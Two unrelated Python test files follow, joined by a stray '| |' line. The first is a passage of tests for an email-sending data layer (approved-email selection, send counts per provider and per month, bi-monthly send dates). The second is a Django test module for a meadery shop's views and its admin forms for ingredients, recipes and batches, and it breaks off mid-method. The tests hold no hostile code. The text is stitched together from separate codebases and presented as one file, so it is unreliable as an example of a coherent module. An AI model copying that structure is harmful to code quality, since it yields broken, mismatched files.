            send_starts_at="2020-10-30",
            send_after="2020-10-30T20:30:00 BST+0100",
            expires="2020-11-07",
            email_state=APPROVED
        )
        # READY (not yet approved) emails must not be picked up
        create_email(
            send_starts_at="2020-10-30",
            send_after="2020-10-30T20:30:00 BST+0100",
            expires="2020-11-07",
            email_state=READY
        )
        res = dao_get_approved_emails_for_sending()
        assert len(res) == 1
    @freeze_time("2020-10-31T12:30:00 BST+0100")
    def it_gets_approved_emails_for_sending_within_time(self, db, db_session):
        create_email(
            send_starts_at="2020-10-30",
            send_after="2020-10-30T20:30:00 BST+0100",
            expires="2020-11-07",
            email_state=APPROVED
        )
        # expired on 2020-10-30, so outside the sending window
        create_email(
            send_starts_at="2020-10-20",
            send_after="2020-10-20T20:30:00 BST+0100",
            expires="2020-10-30",
            email_state=READY
        )
        # not due yet: send_after is in the future
        create_email(
            send_starts_at="2020-11-10",
            send_after="2020-11-30T20:30:00 BST+0100",
            expires="2020-11-17",
            email_state=APPROVED
        )
        res = dao_get_approved_emails_for_sending()
        assert len(res) == 1
    @freeze_time("2020-10-31T12:30:00")
    def it_gets_past_hour_emails_for_provider(
        self, db, db_session, sample_member, sample_email, sample_email_provider
    ):
        email = create_email(
            send_starts_at="2020-10-30",
            send_after="2020-10-30T20:30:00",
            expires="2020-11-07",
            email_state=APPROVED
        )
        member = create_member(
            email="test1@example.com"
        )
        # 12:00 is within the past hour (now is 12:30)
        email_to_member = create_email_to_member(
            email_id=email.id,
            created_at="2020-10-31T12:00:00"
        )
        # 10:00 is older than an hour, so not counted
        create_email_to_member(
            member_id=sample_member.id,
            email_id=email.id,
            created_at="2020-10-31T10:00:00",
            email_provider_id=email_to_member.email_provider_id
        )
        # 11:31 is just within the past hour
        create_email_to_member(
            member_id=member.id,
            email_id=email.id,
            created_at="2020-10-31T11:31:00",
            email_provider_id=email_to_member.email_provider_id
        )
        # use another provider to show that it doesn't get that count
        email_provider = create_email_provider(
            name="Another email provider"
        )
        create_email_to_member(
            member_id=sample_member.id,
            email_id=sample_email.id,
            email_provider_id=email_provider.id,
            created_at="2020-10-31T11:31:00",
        )
        count = dao_get_past_hour_email_count_for_provider(email_to_member.email_provider_id)
        assert count == 2
    @freeze_time("2020-12-20T12:30:00")
    def it_get_emails_sent_count_for_current_month(
        self, db, db_session, sample_member, sample_email
    ):
        email = create_email(
            send_starts_at="2020-11-30",
            send_after="2020-11-30T20:30:00",
            expires="2020-12-20",
            email_state=APPROVED
        )
        member = create_member(
            email="test1@example.com"
        )
        # not counted
        create_email_to_member(
            email_id=email.id,
            created_at="2020-11-30T12:00:00"
        )
        # counted
        create_email_to_member(
            member_id=sample_member.id,
            email_id=email.id,
            created_at="2020-12-11T12:00:00"
        )
        create_email_to_member(
            member_id=member.id,
            email_id=email.id,
            created_at="2020-12-12T12:00:00"
        )
        count = dao_get_emails_sent_count()
        assert count == 2
    @freeze_time("2020-12-20T12:30:00")
    def it_get_emails_sent_count_for_specified_month(
        self, db, db_session, sample_member, sample_email
    ):
        email = create_email(
            send_starts_at="2020-11-30",
            send_after="2020-11-30T20:30:00",
            expires="2020-12-20",
            email_state=APPROVED
        )
        member = create_member(
            email="test1@example.com"
        )
        # counted
        create_email_to_member(
            email_id=email.id,
            created_at="2020-11-30T12:00:00"
        )
        # not counted
        create_email_to_member(
            member_id=sample_member.id,
            email_id=email.id,
            created_at="2020-12-11T12:30:00"
        )
        create_email_to_member(
            member_id=member.id,
            email_id=email.id,
            created_at="2020-12-12T12:00:00"
        )
        count = dao_get_emails_sent_count(month=11, year=2020)
        assert count == 1
class WhenGettingNearestBimonthlyDate:
    """The nearest bi-monthly send date appears to be the closest 1st of an
    odd month (Jan, Mar, ...) — see the frozen dates below."""
    @freeze_time("2019-12-27T10:00:00")
    def it_gets_the_nearest_bimonthly_send_date(self):
        assert str(_get_nearest_bi_monthly_send_date()) == '2020-01-01 00:00:00'
    @freeze_time("2020-01-05T10:00:00")
    def it_gets_the_nearest_bimonthly_send_date_after_day_passed(self):
        # a few days past the send date still maps back to it
        assert str(_get_nearest_bi_monthly_send_date()) == '2020-01-01 00:00:00'
    @freeze_time("2019-12-05T10:00:00")
    def it_gets_the_nearest_bimonthly_send_date_before(self):
        assert str(_get_nearest_bi_monthly_send_date()) == '2020-01-01 00:00:00'
    @freeze_time("2020-02-01T10:00:00")
    def it_gets_the_nearest_bimonthly_send_date_month_before(self):
        assert str(_get_nearest_bi_monthly_send_date()) == '2020-03-01 00:00:00'
| |
from decimal import Decimal
from functools import wraps
from unittest import skipIf

from django.db.models import Count
from django.test import TestCase
from django.urls import reverse

from meadery.models import Ingredient, Parent, Recipe, Batch, Sample, Product
# views.py
# show_category edge cases
# show_product post (add to cart)
# add_review (ugh, all cases)
class ViewTest(TestCase):
    """Smoke tests for the public meadery views."""
    fixtures = ["meadery", "inventory"]

    def setUp(self):
        self.product = Product.instock.all()[0]

    def test_not_found(self):
        self.assertEqual(self.client.get("/notfound").status_code, 404)

    def test_meadery_home(self):
        self.assertEqual(self.client.get(reverse("meadery:home")).status_code, 200)

    def test_meadery_category(self):
        url = reverse("meadery:category", kwargs={"category_value": self.product.category})
        response = self.client.get(url)
        self.assertEqual(response.status_code, 200)
        # the category page lists the product with its stock count
        for expected in (self.product.title, self.product.name, "In Stock: {0}".format(self.product.jars_in_stock())):
            self.assertContains(response, expected)

    def test_meadery_product(self):
        url = reverse("meadery:product", kwargs={"product_slug": self.product.slug})
        self.assertEqual(self.client.get(url).status_code, 200)

    def test_product_add_review(self):
        # JMT: not exactly sure how to do this...
        pass
class IngredientItemTestCase(TestCase):
    """Placeholder: ingredient items are currently exercised indirectly via the recipe tests."""
    pass
class ProductReviewTestCase(TestCase):
    """Placeholder: product review tests may never be written."""
    pass
# test decorators
def admin_login(func):
    """Decorator for test methods that must run as the admin user.

    Logs in with the fixture admin credentials, asserts the login succeeded,
    runs the wrapped test and always logs out again — even when the test
    fails (the original version skipped logout on failure).
    """
    @wraps(func)  # preserve the test's __name__/__doc__ for reporting
    def _decorator(self, *args, **kwds):
        logged_in = self.client.login(username="admin", password="p@ssword")
        self.assertTrue(logged_in)
        try:
            func(self, *args, **kwds)
        finally:
            self.client.logout()
    return _decorator
class MeaderyTestCase(TestCase):
    """Base class for admin tests: shared fixtures plus a login-required check."""
    fixtures = ["meadery", "accounts", "inventory"]

    @classmethod
    def setUpTestData(cls):
        cls.url = reverse("admin:index")

    def test_not_logged_in(self):
        # Anonymous requests must be redirected to the admin login page.
        response = self.client.get(self.url, follow=True)
        self.assertEqual(response.status_code, 200)
        login_url = "{0}?next={1}".format(reverse("admin:login"), self.url)
        self.assertEqual(response.redirect_chain, [(login_url, 302)])
class IngredientTestCase(MeaderyTestCase):
    """Base class for ingredient admin tests.

    ``fields`` holds a valid POST payload for the ingredient form; subclasses
    (and their decorators) mutate ``self.fields``, so each test must get its
    own copy.
    """
    fields = {"name": "Test Honey", "appellation": "(None)", "sg": "1.422", "sh": "0.57", "tolerance": "12", "cpu": "7.95"}

    def setUp(self):
        super(IngredientTestCase, self).setUp()
        self.url = reverse("admin:meadery_ingredient_changelist")
        # Take a copy: the original aliased the class-level dict, so mutations
        # made by decorators like ingredient_add leaked between tests.
        self.fields = dict(IngredientTestCase.fields)
class IngredientAddTestCase(IngredientTestCase):
    """Adding ingredients through the admin add form.

    The tests are driven by the two decorator factories defined in the class
    body below; decorators are applied bottom-up, so ``ingredient_add`` runs
    the POST while logged in, and ``ingredient_exists`` brackets the whole
    thing with existence checks.
    """
    def setUp(self):
        super(IngredientAddTestCase, self).setUp()
        self.url = reverse("admin:meadery_ingredient_add")
    # NOTE: despite living in the class body, the two functions below are
    # decorator factories, not test methods; their first argument is a
    # factory parameter, not ``self``.
    def ingredient_exists(before, after):
        """Assert whether the test ingredient exists before/after the wrapped test."""
        def real_decorator(func):
            def _decorator(self, *args, **kwds):
                self.assertEqual(before, Ingredient.objects.filter(name=self.fields["name"]).exists())
                func(self, *args, **kwds)
                self.assertEqual(after, Ingredient.objects.filter(name=self.fields["name"]).exists())
            return _decorator
        return real_decorator
    def ingredient_add(mytype, subtype, state, respstr):
        """POST the form with the given type/subtype/state and check the response text."""
        def real_decorator(func):
            def _decorator(self, *args, **kwds):
                # NOTE: this mutates self.fields in place
                fields = self.fields
                fields["type"] = mytype
                fields["subtype"] = subtype
                fields["state"] = state
                response = self.client.post(self.url, fields, follow=True)
                self.assertRegex(response.content, bytes(respstr, "utf8"))
                func(self, *args, **kwds)
            return _decorator
        return real_decorator
    @ingredient_exists(False, False)
    @admin_login
    def test_no_post(self):
        # Send no POST data.
        response = self.client.post(self.url)
        self.assertContains(response, "This field is required")
        # JMT: what do I put here?
        # self.assertFormError(response, XXX, YYY, 'This field is required.')
    @ingredient_exists(False, False)
    @admin_login
    @ingredient_add("2", "101", "1", "Ingredient type and subtype must match.")  # Solvent is wrong type!
    def test_bad_post_wrongtype(self):
        pass
    @ingredient_exists(False, False)
    @admin_login
    @ingredient_add("1", "201", "1", "Ingredient type and subtype must match.")  # Water is wrong subtype!
    def test_bad_post_wrongsubtype(self):
        pass
    @ingredient_exists(False, False)
    @admin_login
    @ingredient_add("1", "101", "2", "Ingredient state does not match type.")  # Liquid is wrong state!
    def test_bad_post_wrongstate(self):
        pass
    @ingredient_exists(False, True)
    @admin_login
    @ingredient_add("1", "101", "1", "The ingredient .*{0}.* was added successfully.".format(IngredientTestCase.fields["name"]))  # All good!
    def test_good_post(self):
        pass
class IngredientModifyTestCase(IngredientTestCase):
    """Changing an existing ingredient through the admin change form."""

    def setUp(self):
        super(IngredientModifyTestCase, self).setUp()
        self.ingredient = Ingredient.objects.all()[0]
        self.pk = self.ingredient.pk
        # build the POST payload from the ingredient's current values
        field_names = ("name", "appellation", "sg", "sh", "cpu", "type", "subtype", "state", "tolerance")
        self.fields = {name: getattr(self.ingredient, name) for name in field_names}
        self.url = reverse("admin:meadery_ingredient_change", args=(self.pk,))

    @admin_login
    def test_modify(self):
        original_cpu = self.ingredient.cpu
        updated_cpu = original_cpu + Decimal("1.00")
        self.assertNotEqual(original_cpu, updated_cpu)
        payload = self.fields
        payload["cpu"] = str(updated_cpu)
        response = self.client.post(self.url, payload, follow=True)
        expected = "The ingredient .*{0}.* was changed successfully.".format(self.ingredient.name)
        self.assertRegex(response.content, bytes(expected, "utf8"))
        refreshed = Ingredient.objects.get(pk=self.pk)
        self.assertNotEqual(original_cpu, refreshed.cpu)
        self.assertEqual(updated_cpu, refreshed.cpu)
class IngredientDeleteTestCase(IngredientTestCase):
    """Exercise the admin delete-confirmation page for an ingredient."""

    def setUp(self):
        super(IngredientDeleteTestCase, self).setUp()
        self.ingredient = Ingredient.objects.all()[0]
        self.pk = self.ingredient.pk
        self.url = reverse("admin:meadery_ingredient_delete", args=(self.pk,))

    @admin_login
    def test_delete(self):
        # Only the confirmation page is checked here; actually confirming
        # the delete was previously driven through Selenium (retired below).
        response = self.client.post(self.url, follow=True)
        self.assertContains(response, "Are you sure?")
        # body = self.selenium.find_element_by_tag_name('body')
        # self.assertIn('Are you sure?', body.text)
        # self.assertIn('All of the following related items will be deleted', body.text)
        # self.selenium.find_element_by_xpath('//input[@type="submit"]').click()
        # self.assertIn('The ingredient "%s" was deleted successfully.' % name, self.selenium.find_element_by_tag_name('body').text)
        # self.assertFalse(Ingredient.objects.filter(pk=pk).exists())
# JMT: in the far future, recipes may also require:
# - the final temperature of the mixture be in the yeast friendly range
# - the final volume of the mixture be no bigger than the bucket/carboy
class RecipeTestCase(MeaderyTestCase):
    """Common fixture data and form-building helper for recipe admin tests."""

    fields = {"title": "Test Recipe", "description": "Test description!"}
    # [name, amount, temp] triples: a sugar source, two solvents at
    # different temperatures, and a yeast make a valid recipe.
    ingredients = [["Local Honey", "4.540", "70"], ["Local Water", "9.725", "140"], ["Local Water", "9.725", "70"], ["Red Star Champagne Yeast", "1", "100"]]

    def setUp(self):
        super(RecipeTestCase, self).setUp()
        self.url = reverse("admin:meadery_recipe_changelist")

    @staticmethod
    def build_recipe(fields, ingredients):
        """Return a POST dict for the recipe admin form, including the
        inline ingredient formset management data.

        Bug fix: the original did ``recipe = RecipeTestCase.fields``, which
        both ignored the ``fields`` argument and aliased the shared
        class-level dict, so every formset key (and any later mutation by a
        caller) leaked into ``RecipeTestCase.fields`` across tests.  Build
        from a copy instead, as BatchTestCase.build_batch already does.
        """
        recipe = dict(fields)
        recipe["ingredientitem_set-TOTAL_FORMS"] = len(ingredients)
        recipe["ingredientitem_set-INITIAL_FORMS"] = "0"
        recipe["ingredientitem_set-MIN_NUM_FORMS"] = "0"
        recipe["ingredientitem_set-MAX_NUM_FORMS"] = "1000"
        for index, ingredient in enumerate(ingredients):
            ing = Ingredient.objects.get(name=ingredient[0])
            key_head = "ingredientitem_set-{0}".format(index)
            recipe["{0}-id".format(key_head)] = ""
            recipe["{0}-parent".format(key_head)] = ""
            recipe["{0}-ingredient".format(key_head)] = ing.pk
            recipe["{0}-amount".format(key_head)] = ingredient[1]
            recipe["{0}-temp".format(key_head)] = ingredient[2]
        # The admin page also posts an empty "__prefix__" template form.
        key_head = "ingredientitem_set-{0}".format("__prefix__")
        recipe["{0}-id".format(key_head)] = ""
        recipe["{0}-parent".format(key_head)] = ""
        recipe["{0}-ingredient".format(key_head)] = ""
        recipe["{0}-amount".format(key_head)] = ""
        recipe["{0}-temp".format(key_head)] = ""
        return recipe
class RecipeAddTestCase(RecipeTestCase):
    """Exercise the admin add form for recipes.

    Decorators are applied bottom-up: recipe_add wraps the bare test
    (building and POSTing the form, then checking the response message),
    admin_login opens a session around that, and recipe_exists (outermost)
    asserts existence before and after the whole sequence.
    """

    def setUp(self):
        super(RecipeAddTestCase, self).setUp()
        self.url = reverse("admin:meadery_recipe_add")
        self.recipe = RecipeTestCase.build_recipe(RecipeTestCase.fields, RecipeTestCase.ingredients)

    def recipe_exists(before, after):
        # Decorator factory: assert whether the test recipe exists in the
        # DB before and after the wrapped test runs.
        def real_decorator(func):
            def _decorator(self, *args, **kwds):
                self.assertEqual(before, Recipe.objects.filter(title=self.recipe["title"]).exists())
                func(self, *args, **kwds)
                self.assertEqual(after, Recipe.objects.filter(title=self.recipe["title"]).exists())
            return _decorator
        return real_decorator

    def recipe_add(ings, respstr):
        # Decorator factory: POST a recipe built from the given indices into
        # RecipeTestCase.ingredients and assert the response matches respstr.
        def real_decorator(func):
            def _decorator(self, *args, **kwds):
                recipe = RecipeTestCase.build_recipe(RecipeTestCase.fields, [RecipeTestCase.ingredients[x] for x in ings])
                func(self, *args, **kwds)
                response = self.client.post(self.url, recipe, follow=True)
                self.assertRegex(response.content, bytes(respstr, "utf8"))
            return _decorator
        return real_decorator

    # Each stub below is driven entirely by its decorator stack.
    @recipe_exists(False, False)
    @admin_login
    @recipe_add([], "At least one sugar source is required.")
    def test_bad_post_no_data(self):
        pass

    @recipe_exists(False, False)
    @admin_login
    @recipe_add([0, 1, 2], "At least one yeast is required.")
    def test_bad_post_no_yeast(self):
        pass

    @recipe_exists(False, False)
    @admin_login
    @recipe_add([1, 2, 3], "At least one sugar source is required.")
    def test_bad_post_no_sugar(self):
        pass

    @recipe_exists(False, False)
    @admin_login
    @recipe_add([0, 1, 3], "At least two solvents with different temperatures are required.")
    def test_bad_post_not_enough_solvent(self):
        pass

    @recipe_exists(False, False)
    @admin_login
    @recipe_add([0, 1, 1, 3], "At least two solvents with different temperatures are required.")
    def test_bad_post_solvents_same_temp(self):
        pass

    @recipe_exists(False, True)
    @admin_login
    @recipe_add([0, 1, 2, 3], "The recipe .*{0}.* was added successfully.".format(RecipeTestCase.fields["title"]))
    def test_good_post(self):
        pass
class RecipeModifyTestCase(RecipeTestCase):
    """Exercise the admin change form and create-batch button for recipes."""

    def setUp(self):
        super(RecipeModifyTestCase, self).setUp()
        self.recipe = Recipe.objects.all()[0]
        self.pk = self.recipe.pk
        self.url = reverse("admin:meadery_recipe_change", args=(self.pk,))

    @admin_login
    def test_modify(self):
        """Changing the description through the form persists the change."""
        before = self.recipe.description
        after = before + "!!!"
        self.assertNotEqual(before, after)
        # JMT: this is ... excessive
        form = RecipeTestCase.build_recipe(RecipeTestCase.fields, RecipeTestCase.ingredients)
        form["description"] = after
        response = self.client.post(self.url, form, follow=True)
        expected = "The recipe .*{0}.* was changed successfully.".format(RecipeTestCase.fields["title"])
        self.assertRegex(response.content, bytes(expected, "utf8"))
        reloaded = Recipe.objects.get(pk=self.pk)
        self.assertNotEqual(before, reloaded.description)
        self.assertEqual(after, reloaded.description)

    @skipIf(True, "Django 2.0 does not pass this test -- change batch page comes up")
    @admin_login
    def test_create_batch_from_recipe(self):
        """Pressing the create-batch button makes exactly one new batch."""
        batches_before = Batch.objects.count()
        # JMT: figure out a better way to get this
        button_url = "{0}create_batch/".format(self.url)
        response = self.client.get(button_url, follow=True)
        self.assertEqual(response.status_code, 200)
        expected = "Creating a batch from recipe .*{0}.*:".format(self.recipe.title)
        self.assertRegex(response.content, bytes(expected, "utf8"))
        # Now that we're here, it's just another POST.
        form = {
            "brewname": "SIP 97",
            "batchletter": "A",
            "event": "Christmas",
            "_selected_action": self.recipe.title,
            "action": "create_batch_from_recipe",
            "apply": "Create batch",
        }
        response = self.client.post(button_url, form, follow=True)
        self.assertEqual(response.status_code, 200)
        self.assertEqual(Batch.objects.count(), batches_before + 1)
class RecipeDeleteTestCase(RecipeTestCase):
    """Exercise the admin delete-confirmation page for a recipe."""

    def setUp(self):
        super(RecipeDeleteTestCase, self).setUp()
        self.recipe = Recipe.objects.all()[0]
        self.pk = self.recipe.pk
        self.url = reverse("admin:meadery_recipe_delete", args=(self.pk,))

    @admin_login
    def test_delete(self):
        # Only the confirmation page is checked here; actually confirming
        # the delete was previously driven through Selenium (retired below).
        response = self.client.post(self.url, follow=True)
        self.assertContains(response, "Are you sure?")
        # body = self.selenium.find_element_by_tag_name('body')
        # self.assertIn('Are you sure?', body.text)
        # self.assertIn('All of the following related items will be deleted', body.text)
        # self.selenium.find_element_by_xpath('//input[@type="submit"]').click()
        # self.assertIn('The recipe "%s" was deleted successfully.' % name, self.selenium.find_element_by_tag_name('body').text)
        # self.assertFalse(Recipe.objects.filter(pk=pk).exists())
class RecipeMiscTestCase(RecipeTestCase):
    """Verify that category, appellation, and all_natural are derived from a
    recipe's ingredient list when it is added through the admin."""

    # categories
    dry_ingredients = [
        ["Local Honey", "4.540", "70"],
        ["Local Water", "9.725", "140"],
        ["Local Water", "9.725", "70"],
        ["Red Star Champagne Yeast", "1", "100"],
    ]
    cyser_ingredients = [
        ["Local Honey", "4.540", "70"],
        ["Apple Juice", "9.725", "140"],
        ["Apple Juice", "9.725", "70"],
        ["Red Star Champagne Yeast", "1", "100"],
    ]
    melomel_ingredients = [
        ["Local Honey", "4.540", "70"],
        ["Local Water", "9.725", "140"],
        ["Local Water", "9.725", "70"],
        ["Freeze-Dried Blueberry Powder", "0.238", "100"],
        ["Red Star Champagne Yeast", "1", "100"],
    ]
    metheglin_ingredients = [
        ["Local Honey", "4.540", "70"],
        ["Local Water", "9.725", "140"],
        ["Local Water", "9.725", "70"],
        ["Cinnamon Sticks", "10", "100"],
        ["Red Star Champagne Yeast", "1", "100"],
    ]
    open_ingredients = [
        ["Local Honey", "4.540", "70"],
        ["Apple Juice", "9.725", "140"],
        ["Apple Juice", "9.725", "70"],
        ["Cinnamon Sticks", "10", "100"],
        ["Red Star Champagne Yeast", "1", "100"],
    ]
    # appellations
    oregon_ingredients = [
        ["Local Honey", "4.540", "70"],
        ["Local Water", "9.725", "140"],
        ["Local Water", "9.725", "70"],
        ["Red Star Champagne Yeast", "1", "100"],
    ]
    none_ingredients = [
        ["Scary Honey", "4.540", "70"],
        ["Local Water", "9.725", "140"],
        ["Local Water", "9.725", "70"],
        ["Red Star Champagne Yeast", "1", "100"],
    ]
    # naturalness
    true_ingredients = [
        ["Local Honey", "4.540", "70"],
        ["Local Water", "9.725", "140"],
        ["Local Water", "9.725", "70"],
        ["Red Star Champagne Yeast", "1", "100"],
    ]
    false_ingredients = [["Local Honey", "4.540", "70"], ["Tap Water", "9.725", "140"], ["Tap Water", "9.725", "70"], ["Red Star Champagne Yeast", "1", "100"]]

    def setUp(self):
        super(RecipeMiscTestCase, self).setUp()
        self.recipe = Recipe.objects.all()[0]
        self.pk = self.recipe.pk
        self.url = reverse("admin:meadery_recipe_add")

    def _recipe_attr_decorator(attr):
        """Build a decorator factory asserting that a recipe made from
        ``inglist`` is saved with ``getattr(recipe, attr) == expected``.

        The three public factories below were copy-pasted bodies differing
        only in the attribute checked; this folds them into one.  It also
        fixes the original ``assertTrue(response.status_code, 200)``, which
        treated 200 as the assertion *message* and so could never fail.
        (Called at class-body time, where plain-name lookup works.)
        """
        def factory(inglist, expected):
            def real_decorator(func):
                def _decorator(self, *args, **kwds):
                    func(self, *args, **kwds)
                    recipe = RecipeTestCase.build_recipe(RecipeTestCase.fields, inglist)
                    response = self.client.post(self.url, recipe, follow=True)
                    self.assertEqual(response.status_code, 200)
                    new_recipe = Recipe.objects.get(title=recipe["title"])
                    self.assertEqual(getattr(new_recipe, attr), expected)
                    # hopefully not necessary
                    Recipe.objects.filter(title=recipe["title"]).delete()
                return _decorator
            return real_decorator
        return factory

    # Public names kept identical to the original three factories.
    recipe_add_category = _recipe_attr_decorator("category")
    recipe_add_appellation = _recipe_attr_decorator("appellation")
    recipe_add_natural = _recipe_attr_decorator("all_natural")

    @admin_login
    @recipe_add_category(dry_ingredients, Parent.TRADITIONAL_DRY)
    def test_category_dry(self):
        pass

    @admin_login
    @recipe_add_category(cyser_ingredients, Parent.MELOMEL_CYSER)
    def test_category_cyser(self):
        pass

    @admin_login
    @recipe_add_category(melomel_ingredients, Parent.MELOMEL_OTHER)
    def test_category_melomel(self):
        pass

    @admin_login
    @recipe_add_category(metheglin_ingredients, Parent.OTHER_METHEGLIN)
    def test_category_metheglin(self):
        pass

    @admin_login
    @recipe_add_category(open_ingredients, Parent.OTHER_OPEN_CATEGORY)
    def test_category_open(self):
        pass

    @admin_login
    @recipe_add_appellation(oregon_ingredients, "Oregon")
    def test_appellation_oregon(self):
        pass

    @admin_login
    @recipe_add_appellation(none_ingredients, None)
    def test_appellation_none(self):
        pass

    @admin_login
    @recipe_add_natural(true_ingredients, True)
    def test_natural_true(self):
        pass

    @admin_login
    @recipe_add_natural(false_ingredients, False)
    def test_natural_false(self):
        pass
class BatchTestCase(MeaderyTestCase):
    """Common fixture data and form-building helper for batch admin tests."""

    # JMT: in the far future, batches may also require:
    # - the final temperature of the mixture be in the yeast friendly range
    # - the final volume of the mixture be no bigger than the bucket/carboy it goes into
    fields = {"brewname": "SIP 99", "batchletter": "A", "event": "Christmas", "title": "Test Batch", "description": "Test description!", "jars": "0"}
    # [name, amount, temp] triples for the inline ingredient formset.
    ingredients = [["Local Honey", "4.540", "70"], ["Local Water", "9.725", "140"], ["Local Water", "9.725", "70"], ["Red Star Champagne Yeast", "1", "100"]]
    # No sample rows are posted by any current test.
    samples = []

    def setUp(self):
        super(BatchTestCase, self).setUp()
        self.url = reverse("admin:meadery_batch_changelist")

    @staticmethod
    def build_batch(fields, ingredients, samples):
        """Return a POST dict for the batch admin form, including the
        management-form data for the ingredient and sample inline formsets."""
        batch = {}
        for key, value in list(BatchTestCase.fields.items()):
            batch[key] = value
        batch["ingredientitem_set-TOTAL_FORMS"] = len(ingredients)
        batch["ingredientitem_set-INITIAL_FORMS"] = "0"
        batch["ingredientitem_set-MIN_NUM_FORMS"] = "0"
        batch["ingredientitem_set-MAX_NUM_FORMS"] = "1000"
        for index, ingredient in enumerate(ingredients):
            ing = Ingredient.objects.get(name=ingredient[0])
            key_head = "ingredientitem_set-{0}".format(index)
            batch["{0}-id".format(key_head)] = ""
            batch["{0}-parent".format(key_head)] = ""
            batch["{0}-ingredient".format(key_head)] = ing.pk
            batch["{0}-amount".format(key_head)] = ingredient[1]
            batch["{0}-temp".format(key_head)] = ingredient[2]
        # The admin page also posts an empty "__prefix__" template form.
        key_head = "ingredientitem_set-{0}".format("__prefix__")
        batch["{0}-id".format(key_head)] = ""
        batch["{0}-parent".format(key_head)] = ""
        batch["{0}-ingredient".format(key_head)] = ""
        batch["{0}-amount".format(key_head)] = ""
        batch["{0}-temp".format(key_head)] = ""
        # samples too
        batch["sample_set-TOTAL_FORMS"] = len(samples)
        batch["sample_set-INITIAL_FORMS"] = "0"
        batch["sample_set-MIN_NUM_FORMS"] = "0"
        batch["sample_set-MAX_NUM_FORMS"] = "1000"
        for index, sample in enumerate(samples):
            # NOTE(review): this loop looks copy-pasted from the ingredient
            # loop above -- it uses a "sampleitem_set" key prefix although
            # the management form above says "sample_set", and it posts
            # parent/sample/amount/temp rather than the batch/date/temp/sg/
            # notes fields used by the "__prefix__" template below.  It is
            # never exercised (samples is always []) but needs fixing --
            # against the Sample inline form definition -- before use.
            ing = Sample.objects.get(name=sample[0])
            key_head = "sampleitem_set-{0}".format(index)
            batch["{0}-id".format(key_head)] = ""
            batch["{0}-parent".format(key_head)] = ""
            batch["{0}-sample".format(key_head)] = ing.pk
            batch["{0}-amount".format(key_head)] = sample[1]
            batch["{0}-temp".format(key_head)] = sample[2]
        key_head = "sample_set-{0}".format("__prefix__")
        batch["{0}-id".format(key_head)] = ""
        batch["{0}-batch".format(key_head)] = ""
        batch["{0}-date".format(key_head)] = ""
        batch["{0}-temp".format(key_head)] = "60"
        batch["{0}-sg".format(key_head)] = "0.000"
        batch["{0}-notes".format(key_head)] = ""
        return batch
class BatchAddTestCase(BatchTestCase):
    """Exercise the admin add form for batches.

    Decorators are applied bottom-up: batch_add posts the form and checks
    the response, admin_login opens a session around that, and batch_exists
    (outermost) asserts existence before and after.
    """

    def setUp(self):
        super(BatchAddTestCase, self).setUp()
        self.url = reverse("admin:meadery_batch_add")
        self.batch = BatchTestCase.build_batch(BatchTestCase.fields, BatchTestCase.ingredients, BatchTestCase.samples)

    def batch_exists(before, after):
        # Decorator factory: assert whether the test batch exists in the DB
        # before and after the wrapped test runs.
        def real_decorator(func):
            def _decorator(self, *args, **kwds):
                self.assertEqual(before, Batch.objects.filter(title=self.batch["title"]).exists())
                func(self, *args, **kwds)
                self.assertEqual(after, Batch.objects.filter(title=self.batch["title"]).exists())
            return _decorator
        return real_decorator

    def batch_add(ings, respstr):
        # Decorator factory: POST a batch built from the given indices into
        # BatchTestCase.ingredients (no samples) and check the response.
        # NOTE(review): posts before calling func, whereas recipe_add posts
        # after; harmless today because every wrapped test is `pass`.
        def real_decorator(func):
            def _decorator(self, *args, **kwds):
                batch = BatchTestCase.build_batch(BatchTestCase.fields, [BatchTestCase.ingredients[x] for x in ings], [])
                response = self.client.post(self.url, batch, follow=True)
                self.assertRegex(response.content, bytes(respstr, "utf8"))
                func(self, *args, **kwds)
            return _decorator
        return real_decorator

    # Each stub below is driven entirely by its decorator stack.
    @batch_exists(False, False)
    @admin_login
    @batch_add([], "At least one sugar source is required.")
    def test_bad_post_no_data(self):
        pass

    @batch_exists(False, False)
    @admin_login
    @batch_add([0, 1, 2], "At least one yeast is required.")
    def test_bad_post_no_yeast(self):
        pass

    @batch_exists(False, False)
    @admin_login
    @batch_add([1, 2, 3], "At least one sugar source is required.")
    def test_bad_post_no_sugar(self):
        pass

    @batch_exists(False, False)
    @admin_login
    @batch_add([0, 1, 3], "At least two solvents with different temperatures are required.")
    def test_bad_post_not_enough_solvent(self):
        pass

    @batch_exists(False, False)
    @admin_login
    @batch_add([0, 1, 1, 3], "At least two solvents with different temperatures are required.")
    def test_bad_post_solvents_same_temp(self):
        pass

    @batch_exists(False, True)
    @admin_login
    @batch_add([0, 1, 2, 3], "The batch .*{0} {1}.* was added successfully.".format(BatchTestCase.fields["brewname"], BatchTestCase.fields["batchletter"]))
    def test_good_post(self):
        pass
class BatchModifyTestCase(BatchTestCase):
    """Exercise the admin change form and create-recipe button for batches."""

    def setUp(self):
        super(BatchModifyTestCase, self).setUp()
        self.batch = Batch.objects.all()[0]
        self.pk = self.batch.pk
        self.url = reverse("admin:meadery_batch_change", args=(self.pk,))

    @admin_login
    def test_modify(self):
        """Changing the description through the form persists the change."""
        before = self.batch.description
        after = before + "!!!"
        self.assertNotEqual(before, after)
        # JMT: this is ... excessive
        form = BatchTestCase.build_batch(BatchTestCase.fields, BatchTestCase.ingredients, [])
        form["description"] = after
        response = self.client.post(self.url, form, follow=True)
        expected = "The batch .*{0} {1}.* was changed successfully.".format(BatchTestCase.fields["brewname"], BatchTestCase.fields["batchletter"])
        self.assertRegex(response.content, bytes(expected, "utf8"))
        reloaded = Batch.objects.get(pk=self.pk)
        self.assertNotEqual(before, reloaded.description)
        self.assertEqual(after, reloaded.description)

    @skipIf(True, "Django reports redirect loop incorrectly.")
    @admin_login
    def test_create_recipe_from_batch(self):
        """Pressing the create-recipe button makes exactly one new recipe."""
        # JMT: someday test for existing recipes?
        recipes_before = Recipe.objects.count()
        button_url = "{0}create_recipe/".format(self.url)
        response = self.client.get(button_url, follow=True)
        self.assertEqual(response.status_code, 302)
        expected_chain = [(button_url, 302), (button_url, 302)]
        self.assertEqual(response.redirect_chain, expected_chain)
        self.assertEqual(Recipe.objects.count(), recipes_before + 1)
class BatchCreateProductFromBatchTestCase(BatchModifyTestCase):
    """Exercise the create-product button on the batch change page.

    All of the button tests are currently skipped ("Django reports redirect
    loop incorrectly").
    """

    def setUp(self):
        super(BatchCreateProductFromBatchTestCase, self).setUp()
        # Pick one batch with samples and one without, excluding any batch
        # that already has a matching product.
        batches = Batch.objects.annotate(num_samples=Count("sample"))
        for prod in Product.objects.all():
            batches = batches.exclude(brewname=prod.brewname, batchletter=prod.batchletter)
